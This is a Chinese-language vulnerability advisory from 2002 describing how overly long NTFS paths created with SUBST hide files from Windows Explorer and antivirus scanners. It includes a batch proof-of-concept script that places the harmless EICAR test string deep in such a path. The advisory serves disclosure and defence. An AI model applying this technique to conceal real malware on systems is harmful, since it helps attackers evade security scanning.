首页 -> 安全研究
安全研究
安全漏洞
Microsoft Windows NTFS文件隐藏漏洞
发布日期:2002-01-29
更新日期:2002-01-30
受影响系统:
Microsoft Windows 2000 SP2描述:
Microsoft Windows 2000 SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows NT 4.0SP6a
Microsoft Windows NT 4.0SP6
Microsoft Windows NT 4.0SP5
Microsoft Windows NT 4.0SP4
Microsoft Windows NT 4.0SP3
Microsoft Windows NT 4.0SP2
Microsoft Windows NT 4.0SP1
Microsoft Windows NT 4.0
Microsoft Windows XP Professional
Microsoft Windows XP Home
BUGTRAQ ID: 3989
Microsoft Windows的NTFS文件系统存在一个问题,可以隐藏文件。
NTFS文件系统允许32000个字符的路径长度,但Microsoft Windows操作系统(NT4、2000和XP)限制崴256字节,如果建立的目录长度超过256字节将提示错误。
但是如果用'SUBST'命令把目录映射成盘符,我们就可以继续建立目录,使路径长度突破256字节的限制。当我们去掉盘符映射的时候,由于绝对路径的长度超过256字节,使得目录深处的文件不能够被存取,只有再用'SUBST'命令把一部分目录映射成盘符,我们才能存取那些目录深处的文件。
这个漏洞对一些文件系统扫描程序(如杀毒软件)有很大的危害,当这些程序试图扫描那些超长路径的时候,会被Windows的路径限制所中断。所以一些隐藏在深层目录里的病毒将无法检测到。攻击者可以使用这个漏洞来隐藏文件,用资源管理器和一些其它的工具是无法存取的。
<*来源:Hans Somers (hans.somers@nl.abnamro.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0355.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
@echo off
cls
echo Start test-script NTFS-limit
@echo Create a filepath to the limit of NTFS
md
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
cd
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
@echo Create the Eicar test-string for PoC. This should be detected normally if you
have an active virusscanner.
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
>EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR1.COM >NUL
@echo Create a subst-drive Q: for this path
subst Q:
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
@echo Create e even deeper filepath (thus exceeding the limit of NTFS's explorer)
md Q:\1234567890\1234567890\1234567890
@echo Change current folder into "the deep"
Q:
cd Q:\1234567890\1234567890\1234567890
@echo Create the Eicar test-string
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
>EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR2.COM >NUL
EICAR2.COM
echo .
echo End of test-script
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 严格做好本地权限设置,不要执行不明程序。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/
浏览次数:3151
严重程度:0(网友投票)
绿盟科技给您安全的保障